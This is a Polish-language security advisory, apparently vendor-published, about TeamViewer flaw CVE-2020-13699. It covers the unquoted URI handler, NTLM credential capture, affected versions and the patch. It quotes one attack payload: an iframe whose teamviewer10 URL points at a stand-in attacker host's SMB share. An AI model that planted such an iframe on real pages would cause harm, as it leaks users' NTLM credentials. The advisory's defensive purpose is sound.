W TeamViewer dla Windows znaleziono lukę wysokiego ryzyka. Jest ona oznaczona jako „CVE-2020-13699”, z wynikiem bazowym CVSS „8.8” i może zostać wykorzystana przez zdalnych napastników do złamania hasła użytkownika, a następnie do dalszej eksploatacji systemu.

TeamViewer to aplikacja do zdalnego sterowania, udostępniania pulpitu, spotkań online, konferencji internetowych i przesyłania plików między komputerami, stworzona przez niemiecką firmę TeamViewer GmbH. TeamViewer jest dostępny dla systemów operacyjnych Microsoft Windows, Linux, macOS, Chrome OS, Android, iOS, Windows RT, Windows Phone 8 i BlackBerry. Możliwy jest również dostęp do systemu z uruchomionym TeamViewerem za pomocą przeglądarki internetowej.

Ostatni wzrost wykorzystania oprogramowania do zdalnej łączności spowodowany niedawną zmianą kultury pracy w domu COVID-19 Pandemia.

(CVE-2020-13699) Szczegóły podatności:

• CVE-2020-13699 to błąd w zabezpieczeniach, który wynika z niecytowanej ścieżki wyszukiwania lub elementu. W szczególności, luka ta jest spowodowana tym, że aplikacja nie cytuje poprawnie swoich niestandardowych URI handlers.

• Użytkownik z zainstalowaną podatną wersją programu TeamViewer jest zmuszony do odwiedzenia złośliwie spreparowanej strony internetowej w celu wykorzystania tej luki.

• Według Jeffreya Hofmanna, inżyniera bezpieczeństwa z Praetorian, który odkrył i ujawnił tę lukę „Napastnik mógłby osadzić złośliwą ramkę iframe na stronie internetowej ze spreparowanym adresem URL (iframe src=’teamviewer10: -play \u0026apos; -attacker-IP\share\fake.tvs’), która uruchomiłaby klienta TeamViewer Windows i zmusiła go do otwarcia zdalnego udziału SMB.”
• Windows przeprowadzi uwierzytelnienie NTLM podczas otwierania udziału SMB. Żądanie to może być przekazywane dalej, co pozwala atakującemu przechwycić uwierzytelnienie i wysłać je do innego serwera, dając mu możliwość wykonywania operacji na zdalnym serwerze z wykorzystaniem uprawnień uwierzytelnionego użytkownika.
• Udane wykorzystanie tej luki może pozwolić zdalnemu atakującemu na uruchomienie programu TeamViewer z dowolnymi parametrami. Aplikacja może zostać zmuszona do przekazania żądania uwierzytelnienia NTLM do systemu osoby atakującej, umożliwiając przeprowadzenie ataków offline na tablicę tęczową i próby złamania zabezpieczeń metodą brute force.

• Ataki te mogą prowadzić do dodatkowego wykorzystania skradzionych danych uwierzytelniających z udanego wykorzystania luki.

Ujawnione informacje sugerują, że nie ma dowodów na wykorzystanie tej luki.

Według CIS, ryzyko wykorzystania luki jest wysokie dla instytucji rządowych i firm średniej wielkości. W przypadku małych firm ryzyko jest średnie, a dla użytkowników domowych niskie.

Skutki
Wykorzystanie luk może pozwolić zdalnym napastnikom na uzyskanie poufnych informacji uwierzytelniających lub przejęcie pełnej kontroli nad zaatakowanym systemem.

Zagrożone produkty
TeamViewer Windows Desktop Application w wersji wcześniejszej niż 8.0.0.258861, 9.0.258860, 10.0.258873,11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350 i 15.8.3.

Rozwiązanie
TeamViewer opublikował aktualizację bezpieczeństwa usuwającą lukę CVE-2020-13699.

Opublikowano treści bezpieczeństwa SanerNow, aby wykryć i złagodzić tę lukę. Zdecydowanie zalecamy zastosowanie aktualizacji zabezpieczeń zgodnie z instrukcjami zawartymi w naszym artykule pomocy technicznej.